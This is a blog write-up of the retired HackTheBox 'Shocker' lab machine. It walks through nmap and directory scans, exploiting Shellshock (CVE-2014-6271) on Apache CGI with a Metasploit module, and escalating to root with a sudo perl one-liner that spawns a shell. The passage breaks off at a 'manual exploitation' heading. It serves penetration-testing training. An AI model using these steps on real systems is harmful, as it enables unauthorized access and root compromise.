Shocker Write-up — HackTheBox

4 min readNov 28, 2020

This is the first HTB Write-up on the road to OSCP.
Box creator: mrb3n.

Shocker Box is a retired Easy-rated Linux Machine, who deals with Apache mod_cgi — ‘Shell-shock’ Remote Command Injection Exploit, which can be done using msf or the python script here

Initial Enumeration:

echo ‘ shocker.htb’ >> /etc/hosts
export IP=shocker.htb

nmap -sC -vv -sV -nP -O -A -oN nmap_scan.txt $IP
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk

Seems like we got two open ports -
80/tcp running Apache httpd 2.4.18

Visiting the website:

Seems like we’ve got a single bug.jpg, showing some kind of Bug with hammer above its head. A quick check before moving forward is to check 2 relevant things -
1. Steganography — Trying to extract as many info as possible from the bug.jpg when trying to do so it seems that we didn’t discover anything that could provide us with interesting info.
2. — Trying to see whether this bug.jpg will shows up in other places, such as security blogs or CVE sites etc.
Going through the result in Tineye, we get the following —

It looks like that this bug.jpg is referred to as “bashbug”, a quick search revealed the following exploit — CVE-2014–6271

The cause of the vulnerability lies in a loophole in the Bash algorithm which parses the values of environment variables. According to CVE-2014–6271, the vulnerable Bash version “processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment”.

Main Enumeration:

In this stage I’ve used various tools -
1. dirb
2. dirbuster
3. gobuster
4. wfuzz
5. dirsearch

Note: The relevant file we will soon discover, can be found using any of these tools with the proper flags and modification.

---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
+ http://shocker.htb/index.html (CODE:200|SIZE:14)
+ http://shocker.htb/server-status (CODE:403|SIZE:299)
[05:14:56] Starting:
[05:15:04] 403 - 300B - /.htaccess.bak1
[05:15:04] 403 - 300B - /.htaccess.orig
[05:15:04] 403 - 302B - /.htaccess.sample
[05:15:04] 403 - 300B - /
[05:15:04] 403 - 298B - /.htaccessBAK
[05:15:04] 403 - 298B - /.htaccessOLD
[05:15:04] 403 - 299B - /.htaccessOLD2
[05:15:04] 403 - 291B - /.html
[05:15:04] 403 - 290B - /.htm
[05:15:04] 403 - 297B - /.httr-oauth
[05:15:42] 403 - 294B - /cgi-bin/
[05:15:56] 200 - 137B - /index.html
[05:16:16] 403 - 299B - /server-status
[05:16:16] 403 - 300B - /server-status/
##gobuster 2nd run:
root@kali:/home/czar/Downloads# gobuster dir -u http://shocker.htb/cgi-bin/ -t 80 -w /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.sh
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url: http://shocker.htb/cgi-bin/
[+] Threads: 80
[+] Wordlist: /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,sh
[+] Timeout: 10s
2020/11/28 08:23:39 Starting gobuster
/ (Status: 200)
Progress: 2076 / 220561 (0.94%)^C
[!] Keyboard interrupt detected, terminating.
2020/11/28 08:23:58 Finished

We can see that have found (http://shocker.htb/cgi-bin/ which is what we looking for.


we are going to use multi/http/apache_mod_cgi_bash_env_exec
This module exploits the Shellshock vulnerability, a flaw in how the
Bash shell handles external environment variables. This module
targets CGI scripts in the Apache web server by setting the
HTTP_USER_AGENT environment variable to a malicious function

We will need to change the TARGETURI to be set to /cgi-bin/
spawn a shell using python3, and we’ve got our self a shell via user named ‘shelly’.

Getting User

So not much of an issue here, shelly can grab the user in /home/shelly.

shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt

Privilege Escalation

Learning from other boxes, I though I should upload an enum script or two, and see whether there are interesting finding, but the very first command saved me all of that.

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl

It seems shelly is able to run perl with sudo privilage. A quick jump to GTOF will tell us that if shelly use the command -
sudo perl -e ‘exec “/bin/sh”;’
she will gain root priviliages, so that’s what I did.

shelly@Shocker:/home/shelly$ sudo perl -e ‘exec “/bin/sh”;’
# whoami && id
whoami && id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt

Manuel Exploitation:

The same process can be done using the following python script -